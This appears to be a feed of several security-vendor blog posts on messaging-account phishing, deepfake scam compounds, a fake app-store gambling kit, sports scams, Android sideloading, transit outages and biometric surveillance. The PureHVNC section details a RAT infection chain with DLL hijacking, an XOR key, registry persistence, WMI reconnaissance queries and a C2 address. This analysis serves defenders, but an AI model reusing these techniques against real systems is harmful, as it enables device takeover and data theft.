In a Public Service Announcement (PSA) the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) warn the public about ongoing Russian-linked phishing campaigns that aim to gain access to messaging accounts.
Earlier this month we wrote about a large‑scale phishing campaign aimed at hijacking Signal and WhatsApp accounts belonging to senior officials, military personnel, civil servants, and journalists.
Now the FBI and CISA have joined European intelligence services in warning that the same tactics are being used in a broader campaign targeting these commercial messaging apps. The goal is not to break end‑to‑end encryption, but to walk straight around it by stealing access to individual accounts.
In our previous article, we focused on warnings from the Dutch intelligence services AIVD and MIVD, which described how Russian state‑backed actors approached high‑value targets via Signal and WhatsApp, posing as “Signal Support”, “Signal Security Bot”, or similar. The PSA demonstrates how the same groups are now running global phishing campaigns against messaging app accounts, with evidence suggesting thousands of compromised accounts worldwide.
It’s important to reiterate that the attackers have not managed to break the apps’ end-to-end encryption. Instead, they are relying on social engineering to get a device added so they can eavesdrop on accounts.
The current targets include current and former US government officials, military staff, political figures, and journalists, but there is nothing to stop the same techniques being reused against businesses and everyday users.
So, while it’s tempting to dismiss this as a problem for diplomats and generals (and the agencies issuing these alerts do mention high‑profile targets first), the techniques scale very easily. Once playbooks like these are public, they tend to be copied by cybercriminals looking for new ways to steal money or accounts.
How to protect your accounts
As the PSA puts it:
“Phishing remains one of the most unsophisticated, yet effective means of cyber compromise, often rendering other protections irrelevant”
This calls asks for basic security measures:
Treat unsolicited messages from “Support” inside apps as suspicious by default. Legitimate support for apps like Signal and WhatsApp does not ask you, in a chat message, to send back verification codes, PINs, or passwords. If you receive a warning about account problems, do not follow links in the message. Open the app’s settings directly or visit the official website through other means.
Never share SMS verification codes or app PINs. SMS codes are there to prove that you control a phone number. Anyone who has the code can pretend to be you. App‑specific PINs or passcodes are there to protect account changes. Giving them away is like handing over the keys to your account. Consider anyone asking for them to be a scammer.
Be careful what you discuss and with whom. Both the Dutch and US advisories remind us that even with end‑to‑end encryption, some conversations are too sensitive for commercial chat apps.
Use the extra security features these apps offer. Enable options like registration lock, registration PIN and device‑change alerts so that your account cannot be silently re‑registered without an extra secret. Store your PIN in a password manager instead of choosing something easy to guess or reusing a common code, to reduce the chance of social engineering or shoulder‑surfing.
Another useful feature is disappearing messages. Short‑timer and disappearing messages reduce how much content is available if an attacker gets into a chat later, or if someone obtains long‑term access to a device or backup. They are not a complete solution, but they can limit the damage.
What to do if you think your account was hijacked
If you suspect an attacker has taken over your messaging account:
Try to re‑register your number in the app immediately to kick out other devices.
Revoke all linked devices and change any app‑specific PINs or lock codes.
Warn your contacts that someone may have impersonated you and ask them to treat recent messages with caution.
Review recent conversations for signs of data theft (for example, shared IDs, documents, or passwords that should now be considered exposed).
Report the incident to the app provider and, where appropriate, to national reporting centers such as the FBI’s Internet Crime Complaint Center (IC3) at ic3.gov or the relevant authority in your country.
The sooner you act, the smaller the window in which attackers can exploit your account.
We don’t just report on phone security—we provide it
Scam compounds in Southeast Asia have already become modern slave farms, trapping victims and forcing many of them to become scammers for them. Now they’ve added another type of worker to the mix: so-called AI models.
These professional scammers conduct video calls with their targets, charming them into handing over their cash. As reported in WIRED this week, recruitment ads describe roles handling around a hundred live video calls per day, promoting romance scams and crypto hustles in industrial-scale scam operations across Cambodia, Myanmar, and Laos.
These scam farms already rely on chat operators to ensnare scam victims via messaging apps. Many of these operators are themselves victims of trafficking, forced to work long shifts under threats of violence. They develop relationships with victims over time, exploiting loneliness or financial worries. While they work to make a victim feel special, they’re actually juggling similar text sessions with dozens of people at once. Eventually, a victim may want a video call, either to meet their imagined sweetheart or to confirm an investment opportunity is legitimate (or both).
Chat operators might not have the ability to charm victims on video, especially when they’re victims themselves, being made to work long shifts and are physically beaten. So when a victim asks for a video call, the scam bosses call in a specialist “AI model” with strong interpersonal skills to charm the victim. Despite the name, they’re real people hired to appear on video calls. The AI deepfake software adjusts their looks to match the fictionalized person that the victim is hoping to see.
Scam operations run recruitment ads for these models, and many seem willing to apply for these jobs. Humanity Research Consultancy, an investigative research group that tracks trafficking supply chains, identified a pitch from a 24-year-old Uzbekistani calling herself Angel. She claimed to speak four languages and to have a year’s experience as an AI model. She demanded $7,000 monthly for her services.
The growth of scam compounds
How do these scam compounds even exist? According to the Australian Strategic Policy Institute, Myanmar’s 2021 military coup helped fuel a fraud boom. Scam centers along the Thai border have more than doubled as crime syndicates move into that region, along with Myanmar, Cambodia and Laos.
These scam centers are often tolerated because they line the coffers of local militia. But there have been some countermeasures. Raids and cross-border crackdowns have led to arrests and the movement of large numbers of suspects between countries, including operations targeting compounds such as KK Park in Myawaddy. Cambodia and Myanmar have also signalled increased efforts to tackle scam operations, although the networks remain highly resilient.
This kind of activity becomes easier as technology improves. Real-time face-swapping and deepfake tools are now good enough to support live video, not just pre-recorded clips. We’ve already seen real-time deepfakes used for everything from job interviews through to impersonating banking executives to scam millions. What’s new here is the scale: people handling dozens or even hundreds of calls a day for romance scams and crypto investment fraud shows that this is now a mass exploit.
How to stay safe
Here’s the problem with deepfake video: the common “tells” that let you spot it are evaporating. At one time a sure sign of an AI deepfake was someone with the wrong number of fingers or oddities in hairlines. You can up the ante in live calls by asking someone to turn sideways. Have them touch their nose, and wave their fingers in front of their face. It’s more difficult for deepfake software to handle that extra noise.
But beware: the algorithms that produce deepfakes are getting better all the time, and more easily able to handle such tests. We’re at the point where this deepfake researcher says many more of us will be fooled by them this year.
If you can’t fully trust what you see, fall back on what you know. Be wary of unsolicited contact, especially when someone quickly builds emotional rapport or introduces an investment opportunity. Even if a profile looks well-established or a website appears legitimate, take time to dig a little deeper.
Avoid sharing personal or financial information with someone you’ve only met online, and be wary of anyone who pushes you toward quick decisions or asks to move conversations off established platforms. The FBI has some sound advice on their website.
The most dangerous part of this deepfake AI model trend is that it helps scam operations cross the final frontier. A live human can close a scam that a simple chat interaction can’t. That’s why people like Angel from Uzbekistan have a job, and why you need to be more on your guard than ever.
We don’t just report on scams—we help detect them
Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard. Submit a screenshot, paste suspicious content, or share a link, text or phone number, and we’ll tell you if it’s a scam or legit. Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.
We’ve identified a huge social-engineering campaign designed to steer people into online gambling sites under the impression they’re installing a legitimate app.
We’re calling it FriendlyDealer. It’s been observed across at least 1,500 domains, each hosting a website that impersonates the Google Play or Apple App Store. Users think they’re downloading a gambling app from a trusted source, with all the checks, reviews, and safeguards that implies. But they’re actually still on a website, installing a web app that then redirects them to casino offers through affiliate links.
The campaign doesn’t steal passwords or install traditional malware. Instead, it makes money through commissions every time someone signs up or deposits money at one of these sites.
That might sound less serious than a banking Trojan, but the end result is people being funneled into unregulated gambling sites with no age verification, no deposit limits, and no consumer protections. And it comes at a time when gambling addiction is being called the fastest explosion of gambling the country has ever seen.
One kit, dozens of apps, built to mimic real app stores
FriendlyDealer is built as a single, reusable kit that can generate many different fake app listings.
The kit detects what device you’re using and shows you a different fake store accordingly. Android users see a fake Google Play Store. iPhone users see a fake Apple App Store. The kit even loads the correct system fonts for each platform (Google Sans on Android, San Francisco on iOS) so the typography matches what you’d expect on your own phone.
Fake Apple App Store page: BEAST GAMES: ICE FISHING by Mr. Beast
Fake Apple App Store page: Euro Win
Under the hood, it’s a single web application that reads all of its content from one configuration file embedded in the page. Change that file, and you get a completely different app listing running on the same code.
The operators have used this to spin up at least twenty casino brands, from “Tower Rush” (189 deployments) to “Chicken Road” (97) to “BEAST GAMES: ICE FISHING” (43), which impersonates YouTube creator MrBeast. (It’s worth noting that some skins reuse the names of some legitimate gambling brands but none of these are affiliated with the operation.)
The reviews are fake. Different apps reuse identical usernames, profile photos, text, and developer replies, and they’re repeated across multiple brands. Before showing the fake store, the kit can also display a simple casino mini-game to build engagement.
The fake “Install” button on Android relies on a Chrome feature that only works on mobile. It captures Chrome’s install prompt and triggers it when tapped, so a real installation dialog appears. The usual warning about installing apps from unknown sources does not appear. Previous research has shown that apps installed this way can even display “Installed from Google Play Store” in your phone’s settings.
The code goes to extraordinary lengths to get you into the right browser. If you arrive through a Facebook or Instagram ad, you’re inside those apps’ built-in browser, which can’t trigger the install. On Android, the kit generates a special link that forces the page to reopen in Chrome. On iOS, it does the same thing but for Safari. If Chrome isn’t installed, the fallback sends you to the real Play Store to download it. There’s even a separate handler for Samsung’s browser. The browser-specific engineering is unusually detailed.
The page disables zooming, making close inspection harder. The kit assigns a per-user tracking ID and reuses it across analytics, event, push-registration, and offer-routing flows.
Fake Google Play page: BEAST GAMES: ICE FISHING by Mr. Beast
Fake Google Play page: Chicken road by Valor Casino
Fake Google Play page: Gates of Olympus by Casino
Fake Google Play page: Tower Rush by ELK Studios
Fake Google Play page: Tower Rush by Galaxsys
Fake Google Play page: Morospin by Morospin Inc.
Fake Google Play page: Casino Mexico by Casino Mexico LLC
Fake Google Play page: Revolut Slots by RevGameDev
The kit is wired for paid advertising. The configuration includes empty slots for tracking pixels from four ad platforms: Google, Yandex, Facebook, and TikTok. The app and background script can forward Facebook-style ad identifiers (_fbc / _fbp) when those values are available. The code references Yandex telemetry fields and ships with Russian-language comments and debug strings, which is consistent with a Russian-speaking development context, though those artefacts could also have been inherited from a reused or purchased kit.
The flow is straightforward: buy ad traffic, detect the device, show a fake app store, trigger a real-looking install, and redirect to a casino through an affiliate link.
You’re not installing an app
When a user taps Install, the page doesn’t actually download an app. Instead, the browser creates what’s called a Progressive Web App (PWA). It’s essentially a website that behaves like an app, with its own icon on your home screen and its own splash screen. To most people it’s indistinguishable from a real app.
Once installed, the app can keep running in the background using browser features called service workers (keeping a persistent connection to your device). The samples include the main PWA worker and code to register a separate push worker (to send you notifications) when enabled.
The kit also knows when you’ve already installed it. It checks your device for its own PWA, and if it finds it, it skips the fake store entirely and sends you straight to the casino.
One domain ties it all together
Every FriendlyDealer deployment phones home to the same domain: ihavefriendseverywhere[.]xyz. This is the campaign’s data-collection server, and the name that inspired our tracking name for the operation.
The background script and app code send telemetry to this domain including browser language, timezone, user-agent data, optional user-agent client hints, campaign identifiers, and ad identifiers when those values are available. Much of this is sent via custom request headers.
Some requests use the HEAD method to stay lightweight.
The application code also sends something the background script doesn’t: JavaScript error reports. Every crash, every failed resource load, every unhandled exception that occurs on the victim’s device is caught, packaged into a structured error object with a timestamp and context, and posted to ihavefriendseverywhere[.]xyz/api/log_standard_err. In effect, the operators are collecting both user data and production error telemetry from real devices.
If a request fails (for example, due to poor signal), the background script stores it locally and retries later. Once the connection returns, the data is sent automatically.
The fake app also asks for notification permission. If the user grants it, the kit can register a push subscription and create a direct channel for future notifications. These appear like normal app notifications, giving the operators a direct line back to the user even after the app is closed.
Follow the money: affiliate commissions, not malware
FriendlyDealer doesn’t spread viruses or take over devices. The entire operation runs on affiliate commissions. Each fake app store page contains a hidden redirect to an affiliate tracking network. When a user signs up or deposits money, the operator gets paid.
We found multiple affiliate tracking networks in the code. A per-user ID appears across the kit’s analytics, event, push, and offer-routing logic, allowing activity to be correlated across multiple stages of the funnel.
This model explains the campaign’s enormous scale. Each domain is disposable. The kit is a template; change one configuration file and you have a new casino brand on a new domain in minutes. With gambling affiliate payouts reportedly ranging from $50 to $400 per depositing user, even a small conversion rate across a thousand domains adds up fast.
Who’s behind this?
We can’t attribute the campaign to a specific group, but there are clues. The source code contains Russian-language comments (for example, “Создаем таймер для измерения времени загрузки Vue “). One of the builds shipped with unstripped Russian debug strings that were scrubbed from the production version. The code integrates with Yandex Metrica, which is popular in Russia and the former Soviet states.
These point to a Russian-speaking development context, although the code could have been reused or purchased.
The code also contains affiliate marketing tags—preland-alias and preland-final-action—where a “pre-lander” is the page a visitor sees before the actual offer. The application code shows this tag controls the kit’s behavior: a value of 0 triggers a PWA install, while 1 redirects to an app store. Combined with plug-and-play ad pixel slots, per-deployment configuration, and staging/production logic, this strongly suggests a reusable kit built for multiple campaigns or operators, not a one-off project.
We found multiple builds of the same kit. The production version has debug messages removed, but other builds include full Russian-language error messages and support for Arabic numerals across the interface—download counts, ratings, review dates, and more. This does not look like a kit built for a single market; it appears designed to support regional variants at build time.
A familiar trick with a different payoff
Fake app store pages are a known technique, often used to steal banking credentials or deliver spyware. FriendlyDealer uses the same playbook, a convincing fake store and a real-looking install flow, but with a different goal. It doesn’t take over your phone or steal your passwords. It steers you toward gambling platforms and earns a commission when you spend money.
The harm is financial rather than technical: victims are funneled toward gambling offers through deceptive install and redirect flows, and may end up depositing money at sites they did not intentionally choose.
It’s also s a reminder that not every scam is after your passwords. Affiliate fraud, especially in online gambling, can fund enormous operations without ever touching a single credential. The people behind this built a factory: one template, twenty brands, more than 1,500 domains. Paid ads bring the traffic. The fake app stores seal the deal. The affiliate network pays the bills.
What makes this effective is that it abuses things that are supposed to be trustworthy. Chrome’s app installation flow on Android and Safari’s “Add to Home Screen” on iPhone are both legitimate features, doing what they were designed to do. The problem is that the page triggering the install is a lie. The kit is carefully engineered so only the right users, on the right devices, coming from the right ads, ever see it.
What to do if you installed one of these apps
On Android:
Remove the app: Long-press the icon and tap Uninstall, or go to Settings > Apps and remove anything you don’t recognize.
Clear the site data in Chrome: The app may leave data behind in your browser. Open Chrome > Settings > Site settings > All sites, find the site, and tap Clear & reset.
Check notification permissions: Go to Chrome > Settings > Notifications and remove any sites you don’t recognize. Uninstalling the app does not remove notification access.
Check other browsers: If you use Edge, Brave, or another Chromium-based browser, repeat the same steps there.
On iPhone:
Remove the app: Long-press the app icon on your home screen and tap Remove App. On iOS, PWAs don’t install a background script the way they do on Android, so removing the icon also removes the cached site data.
Clear the site data in Safari: Go to Settings > Safari > Advanced > Website Data, and search for the domain. Swipe to delete it. This clears any remaining cookies and stored data.
Check notification permissions: Go to Settings > Apps > Safari. Scroll to the Settings for Websites section and tap Notifications. Find the site and remove or deny access.
If you deposited money after being routed through one of these pages and believe you were deceived, contact your bank or payment provider promptly.
Indicators of Compromise (IOCs)
Domains
ihavefriendseverywhere[.]xyz—Data exfiltration and error-logging server
March Madness is the annual men’s and women’s NCAA Division I basketball tournament, where 68 teams play in a single-elimination bracket for the US national championship.
But March Madness doesn’t just bring buzzer beaters and busted brackets. It also kicks off a short, intense season for scammers who know fans are distracted, emotional, and often in a hurry. In this post, we’ll walk through the main scam patterns that pop up around the NCAA men’s basketball tournament, so you can recognize them and shut them down before they score.
Large sporting events combine three components that scammers love: money, emotion, and urgency. Fans are hunting for last‑minute tickets, “can’t‑miss” bets, and ways to watch every game. They’re in a hurry, so their guard is down.
From an attacker’s perspective, March Madness is conveniently predictable. Every year in March, millions of people will Google the same terms, click the same types of ads, and respond to the same social media bait. Once you’ve seen the patterns, you’ll start recognizing them around other major events too.
Fake ticket marketplaces and resale fraud
Ticket scams are a staple of any big concert, playoff series, or tournament, and March Madness is no exception.
The playbook is simple: Scammers set up sites and listings that look like legitimate ticket resellers, then take your money and run.
Things to keep an eye on:
Screenshots or PDFs of barcodes won’t work when entry tickets are dynamic or tied to an app, but scammers still sell them. Victims will only find out at the gate when tickets are rejected.
Too good to be true last‑minute deals. Offers for prime seats at prices well below the official box office, often paired with urgency imposing tactics: “must pay in the next 10 minutes,” “three buyers waiting,” or “I’ll lose my deposit if you don’t decide now.”
Sellers push victims into private channels (text, WhatsApp, DMs) and insist on payment methods that are irreversible, like wire transfers, P2P apps, gift cards, or cryptocurrencies.
Fake betting sites, “sure thing” tips, and bonus traps
Legal sports betting has gone mainstream in the US, and March Madness is one of its biggest events. The huge number of casual bettors is a scammer’s dream. Their tactics can be divided into two main categories:
Cloned betting platforms. Attackers create sites and apps that mimic real sportsbooks, complete with copied logos, odds feeds, and login pages. Users deposit funds, place bets, and maybe even see “winnings” pile up in the interface—until they try to withdraw and are hit with fees, extra deposits, silent account bans, or witness a disappearing act.
“Guaranteed” bets. Social media fills up with self‑proclaimed experts selling access to VIP betting groups or “guaranteed” locks on tournament games. Victims pay for tips or are funneled into shady offshore sites that conveniently lose their money or demand more deposits to “unlock” withdrawals.
Streaming scams
Not everyone has a cable subscription or an official streaming package, and scammers know many fans will look for free or cheap alternatives. That creates a fertile ground for malicious streaming offers. There are some common patterns to watch for:
Fake portals promising all the games live. Websites advertise free HD streams of every tournament game but require you to create an account and enter a credit card “for age verification” or a “free trial.” Once you submit details, charges appear or your card data is sold on.
Malicious players and extensions. Some sites will prompt you to download a special player, codec, or browser extension before you can watch. Instead of video, you get adware, browser hijackers, or a foothold for more serious malware.
Shortened URLs and reposted “official stream” links spread quickly around tip‑off time, often redirecting through multiple ad and tracking networks before landing on phishing or scam pages.
Like-farming and other social media clickbait promising free streams only to boost the account’s reputation for a next wave of scams.
Bracket phishing, office pools, and prize scams
Brackets are part of the culture: friends, families, and workplaces run pools where everyone predicts the tournament results. Scammers piggyback on that habit with phishing campaigns and fake prize draws. These usually show up in a few ways:
Official bracket challenge phishing. Emails or messages invite you to join a tournament bracket hosted by a big brand or media outlet, complete with logos and plausible wording. The link really leads to a credential‑harvesting page masquerading as your email, work SSO, or a well‑known sports site.
Fake “you won the pool” notifications. Messages claim you’ve won a prize in a bracket you never joined, and instruct you to click a link or provide personal and banking details to receive your payout.
All the data they can get for you to join. Some bracket or contest sites ask for far more information than necessary. They want your full address, date of birth, even ID numbers, all under the pretext of age verification or tax reporting. Once you provide them, the phishers will monetize the data.
How to stay safe
Defending yourself against March Madness scams isn’t about never betting or never buying tickets. But you should treat the entire tournament as a high-risk period and tighten up your usual habits.
While the underlying technical tricks may vary, the social engineering themes are consistent:
Urgency. Time is limited, for some reason. The goal is to stop you thinking.
Scarcity. Limited seats, limited odds boosts, limited contest spots. All designed to trigger FOMO.
Too good to be true. Playing on hope and excitement.
Authority and familiarity. Scammers use team logos, broadcaster branding, or language that mimics your employer’s internal pool announcements to appear legitimate.
The defenses are also much the same:
Think before you click, act, or buy. If something looks suspicious, check it with Scam Guard.
Type official URLs into the browser or use trusted apps instead of following links from email, DMs, or social posts.
Use protected payment methods. Pay with credit cards or other methods that support chargebacks and dispute resolution.
Treat all unsolicited and unexpected messages as suspicious.
Report incidents. If you think you have been scammed, report it to your bank, the FTC and via BBB’s Scam Tracker.
We don’t just report on scams—we help detect them
Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard. Submit a screenshot, paste suspicious content, or share a link, text or phone number, and we’ll tell you if it’s a scam or legit. Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.
This process is known as sideloading. It means installing an app on your device from somewhere other than the Google Play store, usually by downloading and opening its installation file yourself.
Right now, that typically involves:
Downloading an app file (an APK on Android) from a website, email, or another source instead of Google Play.
Manually installing it, often after turning on a setting that allows apps from “unknown” or “unverified” developers.
From Google’s point of view, this has been a security weak spot. Scammers regularly abuse sideloading to trick victims into installing malware while bypassing built‑in protections.
So anything that helps reduce that risk is welcome.
What Google is changing isn’t dramatic, but it does make the process of installing an app from outside the official Play Store more secure. In simple terms, Advanced Flow adds extra steps and delays so scammers can’t rush people into disabling protections and installing their malware.
How Advanced Flow works
To sideload apps using Advanced Flow, users will need to go through a series of steps:
Enable developer mode in system settings. This is easy enough, and helps prevent accidental or one-tap bypasses often used in high-pressure scams.
Complete a quick safety check to make sure that no one is talking you into turning off your security. Scammers often pressure victims into disabling protections.
Restart your device, which cuts off any remote access or active phone calls a scammer might be using to guide you.
Wait one day, then you can confirm the change using biometrics (like fingerprint or face unlock) or your device PIN. This one-time, one-day delay breaks the urgency scammers rely on, giving you time to think.
Once you’ve confirmed you understand the risks, you’re all set to install apps from unverified developers. You can allow this for seven days or indefinitely. For safety, you’ll still see a warning that the app is from an unverified developer, but you can just tap “Install Anyway.”
In addition to the Advanced Flow, Google is introducing free, limited distribution accounts for students and hobbyists. These let developers share apps with a small group (up to 20 devices) without needing ID verification or a registration fee.
What this means for users
So after these changes, these will be the options for users that have “developer mode” enabled on their Android device.
Sideloading directly from verified developers
Sideloading from developers with limited distribution accounts
Sideloading from unverified developers with Advanced Flow
Image courtesy of Google
Advanced Flow is expected to roll out in August 2026.
Overall, it seems a reasonable compromise. Sideloading isn’t going away, so this keeps that ability but adds meaningful barriers against scam‑driven installs, thwarting social‑engineering campaigns without outright killing power‑user workflows. The one-day delay could turn out to be frustrating though, even if it’s only a one-time event.
We don’t just report on phone security—we provide it
Forget the runaway train thrillingly shot in Buster Keaton’s 1926 film “The General,” and never mind the charging locomotive rescued by actors Denzel Washington and Chris Pine in the 2010 film “Unstoppable,” as there’s a far more frequent (and far less heart-pounding) railcar drama happening across California’s Bay Area: The repeated breakdown of the Bay Area Rapid Transit (BART) system, all because of a few networking errors.
Opened in 1972, BART today carries about 175,000 people every weekday on five separate lines to 50 different stations placed across dozens of cities in the Bay Area, including San Francisco, Oakland, Berkeley, Daly City, Fremont, Richmond, and more. Its tracks and railcars travel both above ground and below, and it is one of the only public transit systems in the US that goes underwater—traveling through what is called the TransBay tube. It is likely the region’s largest public project, spanning 131 miles of track, with a fleet of more than 700 cars, proving vital to workers and residents everywhere, and on May 9, 2025, it all came grinding to a halt, due to what BART officials called a “computer networking problem.”
At the Glen Park station in San Francisco, would-be travelers found yellow caution tape at the entry gates. At the El Cerrito Plaza station, BART staff and police informed visitors that the system was down. And at the Rockridge station in Oakland, a reporter for The San Francisco Chronicle witnessed a small group of people sprinting up the stairs to try and catch a train that never came.
It was the kind of meltdown for public infrastructure that puts an entire system in peril.
And it happened again just months later.
In September, a network crash brought BART to a halt, repeating almost the exact same frustrations and delays for travelers left without transportation to work.
That’s the end of it, right? Wrong. In February 2026, another computer failure caused another outage.
So, in one of the wealthiest regions in America, the subway doesn’t always run, its network is prone to crash, and any money for technology often goes elsewhere.
Today, on the Lock and Code podcast with host David Ruiz, we speak with San Francisco Chronicle transportation report Rachel Swan about what the BART outages revealed about the state of the system’s aging technology, why public infrastructure so often struggles to modernize, and what exactly went wrong in the three prior outages.
“One piece of equipment—and again, this is old equipment—one piece breaks down and they completely lose visibility, so they don’t know where any of the trains are.”
New York City lawmakers are pushing to ban private businesses from using biometric tools like voice and facial recognition software to track the public.
While the desire to use surveillance technology in stores to fight shoplifting is understandable, lawmakers and privacy advocates are worried that the data could be repurposed to profile customers.
The New York City Council has held a hearing over two bills that would ban city landlords and businesses from using facial recognition technology.
One proposal would make it illegal for any public place to use biometric recognition technology to identify or verify a customer.
The other would prohibit landlords from installing, activating, or using any biometric recognition technology that identifies tenants or their guests.
In this article we want to focus on some of the reasons behind these proposals.
For context, it’s good to know that in New York City, businesses that collect biometric data are already required to post standardized signs letting people know.
Let’s look at what happens when your face becomes your ID, and every movement in a store can be turned into another data point.
Why gathering biometric data is considered bad
Collecting biometric data raises several objections. The most pressing ones are:
Unique but hard-to-erase identifiers. While you can reset a password, your face is harder to change. This means data leaks or abuse of facial templates, gait, or voiceprints can create permanent risks and be linked across databases.
Accuracy and bias concerns. Studies and civil liberties groups have found that facial recognition system can be error-prone and biased across different groups.
Lack of meaningful consent. In practice, supermarkets and landlords using facial recognition are giving people a mere theoretical choice. People can submit their biometrics or forego basic services. Critics argue that this undermines genuine consent.
Chilling effect. The feeling of constantly being watched everywhere you go is an uncomfortable one, and can discourage people from engaging in everyday, legitimate activities.
Surveillance pricing. This deserves some more explanation, which we’ll cover next.
What is surveillance pricing?
It’s essentially how your face becomes an unerasable loyalty card.
Imagine you go into a local supermarket and notice that different people pay different prices for the same item. Would that feel fair?
Surveillance pricing refers to the use of detailed consumer data and behavioral signals to dynamically adjust prices.
Some characterize it as retailers using big‑data profiles to segment customers into increasingly narrow groups, down to the level of potentially charging each person the maximum the model thinks they are willing to pay.
We already see versions of this online. When you’re looking for airline tickets, for example, prices can change based on various signals. But it can be hard to notice, and companies tell us it’s not personal. But imagine that same logic quietly following you into the supermarket.
How this works online is relatively straightforward: websites track clicks, time on page, cart activity, and past spending to estimate how sensitive you are to price changes.
In physical stores it’s more complex, but not impossible. Data from in-store security systems that also collect biometrics and facial recognition can be combined with loyalty programs, apps, and in‑store Wi‑Fi analytics could, in theory, be combined to build similar profiles.
Electronic shelf labels (ESL) can already allow retailers to change shelf prices instantly across a store or specific sections.
This could lead to situations where wealthier or more brand-loyal customers are quietly charged more. Or vulnerable groups could be targeted with manipulative discounts for higher‑margin or even less healthy products.
What to do?
Unfortunately, there’s no simple way to privacy‑hack your way out of a system that can turn your body into a tracking ID. The most effective fix is boring but powerful: laws with teeth, regulators that actually enforce them, and stores that don’t hide what they’re doing.
You could:
Avoid stores that openly advertise biometric scanning when there are alternatives.
Support local and national efforts to regulate biometric tracking and related practices, such as the proposals from the New York City Council.
We shouldn’t have to trade access to food, housing, or basic services for the ability to move through a city without our bodies being mined for data. If we don’t draw that line now, practices like surveillance pricing could quietly bake inequality and discrimination into something as mundane as buying groceries.
We don’t just report on privacy—we offer you the option to use it.
Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.
We’ve identified a campaign using business-related lures, such as job interviews, project briefs, and financial document, to distribute malware, including the PureHVNC Remote Access Trojan (RAT).
It’s not the malware that’s new, but how the attack starts.
Instead of the usual phishing email or fake download page, attackers are using Google Forms to kick off the infection chain. The attack typically begins when a victim downloads a business-themed ZIP file linked from a Google Form. Inside is a malicious file that sets off a multi-stage infection process, eventually installing malware on the system.
What is PureHVNC?
PureHVNC is a modular.NETRAT from the “Pure” malware family. In simple terms, it gives attackers remote control over an infected device and lets them steal sensitive information.
Once installed, it can:
Take control of the system and run commands remotely.
Collect information about the device, including operating system, hardware, security software, and info about the user and connected devices.
Steal data from browsers, extensions and crypto wallets.
Extract data from apps like Telegram and Foxmail.
Install additional plugins.
Achieve persistence in several ways (for example, via scheduled tasks).
Different lures, same goal: compromise your device
In our research, we found multiple Google Forms hosting links to malicious ZIP files that start the infection chain. These forms are convincing, impersonating real company names, logos and links. LinkedIn is one of the platforms used to send links to these malicious forms.
Fake Google Forms that distribute malicious ZIPs.
The attackers impersonate real companies
Well-known brands are impersonated to lend credibility
The forms typically ask for professional information (experience, background, etc.), making them feel like part of a real recruitment or business process.
Information requested from the user to make the form appear legitimate.
More information.
The forms link to ZIP files hosted on:
File-sharing services such as Dropbox, filedn.com, and fshare.vn
URL shorteners such as tr.ee and goo.su
Google redirect links that obscure the final destination
The ZIP archives use various names and are tied to different business-related themes (marketing, interviews, projects, job offers, budgets, partnerships, benefits) to avoid suspicion, for example:
Collaboration Project with {CompanyName} Company 2026.zip
The lures use the names of well-known companies, particularly in the financial, logistic, technology, sustainability and energy sectors. Impersonating legitimate organizations add credibility to their campaign.
What happens after you download the file
The ZIP archives usually contain legitimate files (such as PDFs of job descriptions) and an executable file along with a DLL, typically named msimg32.dll. The DLL is executed via DLL hijacking (tricking a legitimate program into loading malicious code), although the technique has undergone multiple modifications and upgrades over time.
Legitimate PDFs are present in some ZIP files, like this one masquerading as a real job description.
Analysis of the malicious campaign
We identified multiple variants of this campaign, each using different methods to extract the archive, distinct Python code, and varying folder structures. Across these variants, the campaign typically includes an executable file along with a DLL hidden in a separate folder. In some cases, attackers also include legitimate files related to the lure’s theme, enhancing the overall credibility of the attack.
Example of files present in one of the archives analyzed.
The malicious code is present in the DLL, and carries out various operations, including:
Decrypting strings with a simple XOR, in this case with the “4B” key.
Detecting debugging and sandboxing with IsDebuggerPresent() and time64(), and displaying the error “This software has expired or debugger detected” if triggered.
Deleting itself, then dropping and launching a fake PDF.
Achieving persistence via the registry key CurrentVersion\Run\Miroupdate.
Extracting the “final.zip” archive and running it.
In this case, the PDF was started with the following command:
cmd.exe /c start "" "C:\Users\user\Desktop\Marketing Director Assessment Project\Marketing_Director_Assessment_Project.pdf"
The PDF opened during the infection chain.
The archive final.zip is unzipped using different commands across the analyzed campaigns into a random folder under ProgramData. In this example, the tar command is used:
The zip contains several files associated with Python and the next stage.
Python files compressed into a random folder in ProgramData.
Next, an obfuscated Python script called config.log is executed. It ultimately decodes and runs a Donut shellcode. This script appears under different names (e.g., image.mp3) and formats in the different chains analyzed.
Obfuscated Python script that ultimately loads the Donut shellcode.
At the end of the infection chain, PureHVNC was injected into SearchUI.exe. The injected process may vary across the analyzed samples.
PureHVNC executes the following WMI queries to gather information about the compromised device:
SELECT * FROM AntiVirusProduct
SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
SELECT Caption FROM Win32_OperatingSystem
For persistence, it creates a scheduled task using a base64-PowerShell command, with the flag “-RunLevel Highest” if the user has admin rights.
PowerShell command for the Scheduled Task
PureHVNC performs enumeration to exfiltrate information related to various browsers, extensions, and cryptocurrency wallets.
Methods related to wallet and browser data exfiltration.
The malware configuration is encoded with base64 and compressed with GZIP.
In this case, the configuration includes:
C2: 207.148.66.14
C2 ports: 56001, 56002, 56003
Campaign ID: Default
Sleeping Flag: 0
Persistence Path: APPDATA
Mutex Name: Rluukgz
How to stay safe
Using Google Forms is a highly effective method for distributing malware. Attackers are relying on trust in familiar tools like Google Forms, Dropbox, and LinkedIn, and impersonating legitimate companies to get past your guard.
If you deal with job offers, partnerships, or project work online, this is worth paying attention to:
Always check the origin of Google Forms, don’t enter sensitive information, and don’t download files unless you fully trust the source.
Verify requests through official company channels before engaging.
Be wary of links hidden behind URL shorteners or redirects.
Pro tip: This is only a partial list of malicious URLs. Download the Malwarebytes Browser Guard plugin for full protection and to block the remaining malicious domains.
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
Researchers at Google have identified an iOS exploit chain, named DarkSword, that has been used since late last year by multiple actors to infect iPhones with malware in targeted attacks.
DarkSword combines six vulnerabilities in iOS and Safari to deploy malware on the device. It demonstrates, once again, how important it is to keep up with updates.
